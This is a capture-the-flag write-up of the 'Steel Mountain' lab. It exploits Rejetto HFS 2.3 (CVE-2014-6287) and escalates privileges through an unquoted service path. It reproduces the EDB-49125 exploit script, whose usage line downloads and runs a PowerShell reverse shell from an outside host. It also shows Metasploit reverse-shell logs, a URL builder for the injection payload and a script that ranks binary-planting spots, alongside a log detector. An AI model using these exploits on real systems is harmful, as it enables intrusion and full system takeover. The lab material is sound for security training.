🤖 STEEL MOUNTAIN
MR. ROBOT
I ran a port scan against the target with Nmap, using nmap -sV -sC -oN nmap.out -p- <target ip>
to get the services and versions running on every TCP port.
In the Nmap results I identified several services: a web server (Microsoft IIS 8.5) on port 80, MSRPC on 135, NetBIOS/SMB on 139 and 445, HTTP listeners on 5985 and 47001 (the ports WinRM uses), an HTTP file server on 8080, and RDP on 3389, reported as ssl/ms-wbt-server because the RDP session is wrapped in TLS.
Question: Deploy the machine. Who is the employee of the month?
Browsing the website on port 80, I found the "Employee of the Month" image; the file name in the page source gives away the name: Bill Harper.
Answer: Bill Harper
Task 2 (Initial Access)
After deploying the machine, I scanned again to find which other port was serving a web server. The earlier Nmap scan had already shown an HTTP File Server (version 2.3) on port 8080.
Question: Scan the machine with nmap. What is the other port running a web server on?
Answer: 8080
Browsing that port showed it was the Rejetto HTTP File Server. I then used searchsploit
to find the CVE associated with this version (2.3.x).
Question: What is the CVE number to exploit this file server?
Answer: CVE-2014-6287
I used Metasploit (exploit/windows/http/rejetto_hfs_exec) to get an initial shell; after the exploit ran I had a Meterpreter session as STEELMOUNTAIN\bill.
Question: Use Metasploit to get an initial shell. What is the user flag?
The user flag is: b04763b6fcf51fcd7c13abc7db4fd365
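As an added example (it is not part of the original write-up, nor the EDB-49125 script reproduced in the raw notes below), the following Python shows both sides of CVE-2014-6287: how the malicious request is built, and how a defender would recognise it in HFS or proxy access logs. The log lines are constructed for the example; the addresses reuse the attacker and victim IPs from this write-up. The log format (ip, method, request-target) is an assumption.

```python
"""Build and detect the HFS 2.3 search-macro injection (CVE-2014-6287).

Added example for this write-up, not the EDB-49125 script. HFS 2.3 evaluates
{.<macro>|<args>.} sequences found in the ?search= parameter; the request is
supposed to be rejected when it contains a macro, but a leading NUL byte (%00)
truncates that check, so {.exec|<cmd>.} runs <cmd> on the server.
"""
import re
from urllib.parse import parse_qs, quote, urlsplit

# HFS macro syntax: {.name|argument.}  Whitespace after "{." is tolerated;
# EDB-49125 sends "{.+exec|", where "+" decodes to a space.
MACRO_RE = re.compile(r"\{\.\s*(?P<macro>[A-Za-z_]+)\s*\|(?P<arg>[^}]*)\.\}")


def build_exploit_url(host: str, port: int, command: str) -> str:
    """Same request shape as EDB-49125: NUL byte, then an exec macro."""
    return f"http://{host}:{port}/?search=%00{{.exec|{quote(command)}.}}"


def extract_macros(request_target: str) -> list[dict]:
    """Decode the search= parameter of one request and return any HFS macros.

    Works on a full URL or on the request-target seen in a log line.
    """
    query = urlsplit(request_target).query
    params = parse_qs(query, keep_blank_values=True)  # %00 -> "\x00", "+" -> " "
    found = []
    for value in params.get("search", []):
        for m in MACRO_RE.finditer(value):
            found.append({
                "macro": m.group("macro"),
                "arg": m.group("arg"),
                "null_byte": "\x00" in value,  # the filter-bypass marker
            })
    return found


def scan_log(log_text: str) -> list[dict]:
    """Flag macro injections in lines of the form '<ip> <method> <target>'."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        ip, target = parts[0], parts[2]
        for macro in extract_macros(target):
            hits.append({"ip": ip, **macro})
    return hits


# Constructed sample log (not captured from the target); the addresses reuse
# the attacker and victim IPs from this write-up. Line 4 is fully URL-encoded,
# line 5 uses the save macro (arbitrary file write) instead of exec.
SAMPLE_LOG = """\
10.10.53.67 GET /?search=%00{.+exec|whoami.}
10.10.53.67 GET /
10.10.53.67 GET /?search=report
10.6.93.171 GET /?search=%00%7B.exec%7Ccmd+/c+ping.%7D
10.10.53.67 GET /?search=%00{.save|C:\\Users\\Public\\x.vbs|abc.}
"""

if __name__ == "__main__":
    print(build_exploit_url("10.10.220.84", 8080, "whoami"))
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The detector decodes before matching, so encoded, plus-separated and plain variants all collapse to the same pattern; the null_byte flag tells you the request was crafted to bypass the macro check rather than being an odd but legitimate search.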
Task 3 (Privilege Escalation)
With an initial shell, I enumerated the machine with the PowerShell script PowerUp (Invoke-AllChecks). It reported several issues, among them an unquoted service path for the service "AdvancedSystemCareService9", which runs as LocalSystem and which the current user is allowed to restart.
Question: Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?
The service name is: AdvancedSystemCareService9
To escalate, I generated a reverse-shell executable with msfvenom in the exe-service format (a binary that never registers with the Service Control Manager is reported as failed and terminated, so a plain exe would not survive as a service), uploaded it as Advanced.exe into C:\Program Files (x86)\IObit\, one of the locations Windows tries before the real binary when resolving the unquoted path C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe, and restarted the service so that it launched my binary as NT AUTHORITY\SYSTEM.
Question: What is the root flag?
The root flag is on the Administrator's Desktop: 9af5f314f57607c00fd09803a587db80
Task 4 (Access and Escalation Without Metasploit)
In this task I used an exploit without Metasploit: I downloaded a public exploit script, edited it as the room instructs, and ran it to get a reverse shell.
Answer: No answer needed
Finally, I ran winPEAS, which flagged the same unquoted service path that PowerUp had reported from the Meterpreter session.
Question: What powershell -c command could we run to manually find out the service name?
Answer: powershell -c Get-Service
With that, I generated a payload with msfvenom and transferred it to the host with PowerShell.
This room covered the full path from the initial scan to privilege escalation, first with Metasploit and then again without it.
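The privilege escalation in Tasks 3 and 4 depends on two facts: which file names Windows tries when it starts a service whose ImagePath is unquoted and contains spaces, and which of those names sit in a directory the low-privileged user can write to. The added Python below (it is not PowerUp, winPEAS or any code from the original write-up) works that out from the PowerUp records shown in the raw notes further down. The service paths, StartName, CanRestart values and the two ModifiablePath entries are copied from that output; the ranking logic and the data layout are the example's own.

```python
"""Which file an unquoted service path actually launches, and where a
low-privileged user could plant one.

Added example for this write-up (not PowerUp or winPEAS code). The service
records and the writable-directory entries are copied from the PowerUp output
on this page; everything else is the example's own logic.
"""
import ntpath

# From the PowerUp "Unquoted Service Paths" records on this page.
SERVICES = [
    {"name": "AdvancedSystemCareService9",
     "path": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
     "start_name": "LocalSystem", "can_restart": True},
    {"name": "AWSLiteAgent",
     "path": r"C:\Program Files\Amazon\XenTools\LiteAgent.exe",
     "start_name": "LocalSystem", "can_restart": False},
    {"name": "IObitUnSvr",
     "path": r"C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe",
     "start_name": "LocalSystem", "can_restart": False},
    {"name": "LiveUpdateSvc",
     "path": r"C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe",
     "start_name": "LocalSystem", "can_restart": False},
]

# Directories PowerUp reported as writable (ModifiablePath) and by which identity.
WRITABLE_DIRS = {
    "C:\\": "BUILTIN\\Users",
    "C:\\Program Files (x86)\\IObit": "STEELMOUNTAIN\\bill",
}


def is_unquoted_with_spaces(image_path: str) -> bool:
    """The precondition: no surrounding quotes and at least one space."""
    return not image_path.startswith('"') and " " in image_path


def hijack_candidates(image_path: str) -> list[str]:
    """Executables CreateProcess tries, in order, for an unquoted path.

    Each prefix ending at a space is tried first; ".exe" is appended when the
    prefix has no extension. The real binary is the last entry.
    """
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    candidates.append(image_path)
    return candidates


def plantable(image_path: str, writable_dirs: dict) -> list:
    """Candidates (excluding the real binary) whose directory we can write to."""
    writable = {ntpath.normcase(d): who for d, who in writable_dirs.items()}
    out = []
    for cand in hijack_candidates(image_path)[:-1]:
        who = writable.get(ntpath.normcase(ntpath.dirname(cand)))
        if who:
            out.append((cand, who))
    return out


def triage(services: list, writable_dirs: dict) -> list:
    """Rank unquoted-path services: plantable and restartable ones first."""
    rows = []
    for svc in services:
        if not is_unquoted_with_spaces(svc["path"]):
            continue
        spots = plantable(svc["path"], writable_dirs)
        rows.append({**svc, "plant": spots,
                     "ready": bool(spots) and svc["can_restart"]})
    return sorted(rows, key=lambda r: (not r["ready"], not r["can_restart"], r["name"]))


if __name__ == "__main__":
    for row in triage(SERVICES, WRITABLE_DIRS):
        print(row["name"], "ready" if row["ready"] else "no", row["plant"])
```

Two things the output makes visible that the PowerUp listing does not: C:\Program.exe is tried before C:\Program Files (x86)\IObit\Advanced.exe, so whichever candidate exists earliest in the list wins, and only AdvancedSystemCareService9 combines a plantable location with CanRestart, which is why it is the one worth hijacking. Before relying on the C:\ entries, confirm them with icacls C:\ on the box: PowerUp reports inherited and inherit-only ACEs alike, so a write permission shown for the root may apply only to subfolders.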
// Raw notes: pentestingOfensivoMONTAÑADEACERO.txt
OFFENSIVE PENTESTING:
STEEL MOUNTAIN (MR. ROBOT):
SCAN AND ENUMERATION:
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -Pn --script="vuln" 10.10.220.84
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-18 21:29 UTC
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 45.45% done; ETC: 21:30 (0:00:20 remaining)
Stats: 0:02:44 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.64% done; ETC: 21:32 (0:00:00 remaining)
Nmap scan report for ip-10-10-220-84.eu-west-1.compute.internal (10.10.220.84)
Host is up (0.00055s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-IIS/8.5
| vulners:
| cpe:/a:microsoft:internet_information_services:8.5:
|_ CVE-2014-4078 5.1 https://vulners.com/cve/CVE-2014-4078
|_http-csrf: Couldn't find any CSRF vulnerabilities.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
8080/tcp open http HttpFileServer httpd 2.3
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| vulners:
| cpe:/a:rejetto:httpfileserver:2.3:
| EDB-ID:49584 10.0 https://vulners.com/exploitdb/EDB-ID:49584 *EXPLOIT*
| EDB-ID:49125 10.0 https://vulners.com/exploitdb/EDB-ID:49125 *EXPLOIT*
| EDB-ID:39161 10.0 https://vulners.com/exploitdb/EDB-ID:39161 *EXPLOIT*
| EDB-ID:34668 10.0 https://vulners.com/exploitdb/EDB-ID:34668 *EXPLOIT*
| 1337DAY-ID-35849 10.0 https://vulners.com/zdt/1337DAY-ID-35849 *EXPLOIT*
| SECURITYVULNS:VULN:14023 7.5 https://vulners.com/securityvulns/SECURITYVULNS:VULN:14023
| PACKETSTORM:161503 7.5 https://vulners.com/packetstorm/PACKETSTORM:161503 *EXPLOIT*
| PACKETSTORM:160264 7.5 https://vulners.com/packetstorm/PACKETSTORM:160264 *EXPLOIT*
| PACKETSTORM:135122 7.5 https://vulners.com/packetstorm/PACKETSTORM:135122 *EXPLOIT*
| PACKETSTORM:128593 7.5 https://vulners.com/packetstorm/PACKETSTORM:128593 *EXPLOIT*
| PACKETSTORM:128243 7.5 https://vulners.com/packetstorm/PACKETSTORM:128243 *EXPLOIT*
| EXPLOITPACK:A6E51CB06A5AB6562CC6D5A235ECDE13 7.5 https://vulners.com/exploitpack/EXPLOITPACK:A6E51CB06A5AB6562CC6D5A235ECDE13 *EXPLOIT*
| EXPLOITPACK:A39709063C426496F984E8852560BBFF 7.5 https://vulners.com/exploitpack/EXPLOITPACK:A39709063C426496F984E8852560BBFF *EXPLOIT*
| 1337DAY-ID-25379 7.5 https://vulners.com/zdt/1337DAY-ID-25379 *EXPLOIT*
| 1337DAY-ID-22733 7.5 https://vulners.com/zdt/1337DAY-ID-22733 *EXPLOIT*
|_ 1337DAY-ID-22640 7.5 https://vulners.com/zdt/1337DAY-ID-22640 *EXPLOIT*
|_http-server-header: HFS 2.3
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.tenable.com/plugins/nessus/55976
| https://seclists.org/fulldisclosure/2011/Aug/175
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_ https://www.securityfocus.com/bid/49303
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-method-tamper:
| VULNERABLE:
| Authentication bypass by HTTP verb tampering
| State: VULNERABLE (Exploitable)
| This web server contains password protected resources vulnerable to authentication bypass
| vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
| common HTTP methods and in misconfigured .htaccess files.
|
| Extra information:
|
| URIs suspected to be vulnerable to HTTP verb tampering:
| /~login [GENERIC]
|
| References:
| http://capec.mitre.org/data/definitions/274.html
| https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
| http://www.imperva.com/resources/glossary/http_verb_tampering.html
|_ http://www.mkit.com.ar/labs/htexploit/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:DA:95:D5:44:85 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/18%OT=80%CT=1%CU=36354%PV=Y%DS=1%DC=D%G=Y%M=02DA95%T
OS:M=65A9992D%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=2%ISR=10D%TI=I%CI=I%II=I
OS:%SS=S%TS=7)OPS(O1=M2301NW8ST11%O2=M2301NW8ST11%O3=M2301NW8NNT11%O4=M2301
OS:NW8ST11%O5=M2301NW8ST11%O6=M2301ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000
OS:%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M2301NW8NNS%CC=Y%Q=)T1(R=Y%D
OS:F=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0
OS:%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=
OS:A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=
OS:Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=A
OS:R%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%R
OS:UD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-061: No accounts left to try
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: No accounts left to try
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 220.35 seconds
///////////////////////////////////
WE CONFIRM THE SERVER AT http://10.10.220.84:8080/ AND LOOK FOR AN EXPLOIT, FINDING ONE. (The vuln-script hits for the Apache byte-range DoS and Slowloris on 8080 are generic checks, not evidence of Apache; the usable finding is the HFS 2.3 banner, which the landing page repeats.)
HFS landing page (nothing shared):
User / Login / Folder: Home / 0 folders, 0 files, 0 bytes
Server information: HttpFileServer 2.3
Server time: 1/18/2024 1:36:51 PM
Server uptime: 00:28:19
No files in this folder
┌──(root㉿kali)-[~]
└─# searchsploit HttpFileServer
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~]
└─# searchsploit -m windows/webapps/49125.py
Exploit: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
URL: https://www.exploit-db.com/exploits/49125
Path: /usr/share/exploitdb/exploits/windows/webapps/49125.py
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /root/49125.py
┌──(root㉿kali)-[~]
└─# ls
49125.py Desktop Documents Downloads Music Pictures Public Templates Videos
┌──(root㉿kali)-[~]
└─# cat 49125.py
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
#!/usr/bin/python3
# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
import urllib3
import sys
import urllib.parse

try:
    http = urllib3.PoolManager()
    # %00 is the NUL byte that defeats HFS's check for macros in the search
    # string; {.exec|<cmd>.} is the HFS macro that runs <cmd> on the server
    # (the "+" is a URL-encoded space, which HFS tolerates after "{.").
    url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
    print(url)
    response = http.request('GET', url)
except Exception as ex:
    print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
    print(ex)
////////////////////////////////
WITH METASPLOIT WE FIND THE EXPLOIT FOR HTTPFILESERVER AND GET A METERPRETER SESSION (note that RPORT must be changed from the default 80 to 8080, where HFS listens):
┌──(root㉿kali)-[~]
└─# msfconsole
=[ metasploit v6.2.23-dev ]
+ -- --=[ 2259 exploits - 1188 auxiliary - 402 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
msf6 > search httpfileserver
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > ls
[*] exec: ls
49125.py Desktop Documents Downloads Music Pictures Public Templates Videos
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.220.84
RHOSTS => 10.10.220.84
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.220.84 yes The target host(s), see https://github.com/rapid7/metasploit
-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must
be an address on the local machine or 0.0.0.0 to listen on a
ll addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly genera
ted)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.53.67 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.220.84 yes The target host(s), see https://github.com/rapid7/metasploit
-framework/wiki/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must
be an address on the local machine or 0.0.0.0 to listen on a
ll addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly genera
ted)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.53.67 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.53.67:4444
[*] Using URL: http://10.10.53.67:8080/QGDBdrjowSJK5k
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /QGDBdrjowSJK5k
[*] Sending stage (175686 bytes) to 10.10.220.84
[*] Sending stage (175686 bytes) to 10.6.93.171
[*] Sending stage (175686 bytes) to 10.6.93.171
[*] Sending stage (175686 bytes) to 10.6.93.171
[*] 10.10.220.84 - Meterpreter session 2 closed. Reason: Died
[*] Sending stage (175686 bytes) to 10.6.93.171
[!] Tried to delete %TEMP%\ckzvMJkkTQz.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.53.67:4444 -> 10.10.220.84:49277) at 2024-01-18 22:11:02 +0000
[*] 10.10.220.84 - Meterpreter session 3 closed. Reason: Died
[*] Server stopped.
meterpreter >
meterpreter > sysinfo
Computer : STEELMOUNTAIN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > guid
[+] Session GUID: 24a851e4-2c52-4888-a0da-1a4bab0eefb9
meterpreter > getpid
Current pid: 2932
meterpreter > getuid
Server username: STEELMOUNTAIN\bill
meterpreter > netstat
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:80 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 736/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:3389 0.0.0.0:* LISTEN 0 0 1904/svchost.exe
tcp 0.0.0.0:5985 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:8080 0.0.0.0:* LISTEN 0 0 996/hfs.exe
tcp 0.0.0.0:47001 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 556/wininit.exe
tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 964/svchost.exe
tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 1004/svchost.exe
tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 652/lsass.exe
tcp 0.0.0.0:49156 0.0.0.0:* LISTEN 0 0 1212/spoolsv.exe
tcp 0.0.0.0:49169 0.0.0.0:* LISTEN 0 0 644/services.exe
tcp 0.0.0.0:49170 0.0.0.0:* LISTEN 0 0 1956/svchost.exe
tcp 10.10.220.84:139 0.0.0.0:* LISTEN 0 0 4/System
tcp 10.10.220.84:49277 10.10.53.67:4444 ESTABLISHED 0 0 2932/QuAYnAaGoYf.exe
tcp 10.10.220.84:49289 169.254.169.254:80 CLOSE_WAIT 0 0 1672/Ec2Config.exe
tcp6 :::80 :::* LISTEN 0 0 4/System
tcp6 :::135 :::* LISTEN 0 0 736/svchost.exe
tcp6 :::445 :::* LISTEN 0 0 4/System
tcp6 :::3389 :::* LISTEN 0 0 1904/svchost.exe
tcp6 :::5985 :::* LISTEN 0 0 4/System
tcp6 :::47001 :::* LISTEN 0 0 4/System
tcp6 :::49152 :::* LISTEN 0 0 556/wininit.exe
tcp6 :::49153 :::* LISTEN 0 0 964/svchost.exe
tcp6 :::49154 :::* LISTEN 0 0 1004/svchost.exe
tcp6 :::49155 :::* LISTEN 0 0 652/lsass.exe
tcp6 :::49156 :::* LISTEN 0 0 1212/spoolsv.exe
tcp6 :::49169 :::* LISTEN 0 0 644/services.exe
tcp6 :::49170 :::* LISTEN 0 0 1956/svchost.exe
tcp6 ::1:445 ::1:49287 ESTABLISHED 0 0 4/System
tcp6 ::1:49287 ::1:445 ESTABLISHED 0 0 4/System
udp 0.0.0.0:123 0.0.0.0:* 0 0 444/svchost.exe
udp 0.0.0.0:500 0.0.0.0:* 0 0 1004/svchost.exe
udp 0.0.0.0:3389 0.0.0.0:* 0 0 1904/svchost.exe
udp 0.0.0.0:4500 0.0.0.0:* 0 0 1004/svchost.exe
udp 0.0.0.0:5355 0.0.0.0:* 0 0 692/svchost.exe
udp 10.10.220.84:137 0.0.0.0:* 0 0 4/System
udp 10.10.220.84:138 0.0.0.0:* 0 0 4/System
udp6 :::123 :::* 0 0 444/svchost.exe
udp6 :::500 :::* 0 0 1004/svchost.exe
udp6 :::3389 :::* 0 0 1904/svchost.exe
udp6 :::4500 :::* 0 0 1004/svchost.exe
udp6 :::5355 :::* 0 0 692/svchost.exe
RATHER THAN ENUMERATING SERVICES BY HAND FROM THE METERPRETER SESSION, WE USE AN AUTOMATED SCRIPT: DOWNLOAD POWERUP ON THE ATTACKER MACHINE, UPLOAD IT TO THE VICTIM AND RUN IT THROUGH METERPRETER'S POWERSHELL EXTENSION:
┌──(root㉿kali)-[~]
└─# wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
--2024-01-18 22:44:12-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 600580 (587K) [text/plain]
Saving to: ‘PowerUp.ps1’
PowerUp.ps1 100%[====================================>] 586.50K --.-KB/s in 0.005s
2024-01-18 22:44:12 (108 MB/s) - ‘PowerUp.ps1’ saved [600580/600580]
┌──(root㉿kali)-[~]
└─# ls
2856 Desktop Downloads Pictures Public Templates user.txt
49125.py Documents Music PowerUp.ps1 QuAYnAaGoYf.exe Videos
meterpreter > upload PowerUp.ps1
[*] uploading : /root/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 586.50 KiB of 586.50 KiB (100.0%): /root/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded : /root/PowerUp.ps1 -> PowerUp.ps1
meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 600580 fil 2024-01-18 22:46:11 +0000 PowerUp.ps1
100666/rw-rw-rw- 282 fil 2019-09-27 11:07:07 +0000 desktop.ini
100666/rw-rw-rw- 70 fil 2019-09-27 12:42:38 +0000 user.txt
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
